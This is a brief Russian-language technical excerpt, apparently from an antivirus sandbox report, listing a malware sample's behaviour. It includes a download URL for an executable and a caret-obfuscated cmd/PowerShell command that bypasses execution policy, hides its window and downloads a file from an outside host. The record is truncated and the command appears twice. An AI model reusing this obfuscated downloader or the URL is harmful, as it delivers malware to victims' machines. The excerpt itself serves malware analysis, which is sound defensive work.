Техническая информация
- http://ucicnow.com/images/atcknb/hsqo9.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PoWe^RsH^E^l^L.e^XE^ -E^xe^CUtiO^nP^O^LI^cy^ bYPas^s ^-nOPROFi^LE ^-wi^ndoWSt^Yl^E ^hId^DE^N (nEW-o^B^JeCt S^YS^TeM.nEt.^weBclI^En^T).d^ownLOa^df^ILe^('http://ucicnow.com/images...
- DNS ASK uc##now.com
- '<SYSTEM32>\cmd.exe' /C "PoWe^RsH^E^l^L.e^XE^ -E^xe^CUtiO^nP^O^LI^cy^ bYPas^s ^-nOPROFi^LE ^-wi^ndoWSt^Yl^E ^hId^DE^N (nEW-o^B^JeCt S^YS^TeM.nEt.^weBclI^En^T).d^ownLOa^df^ILe^('http://ucicnow.com/images...' (со скрытым окном)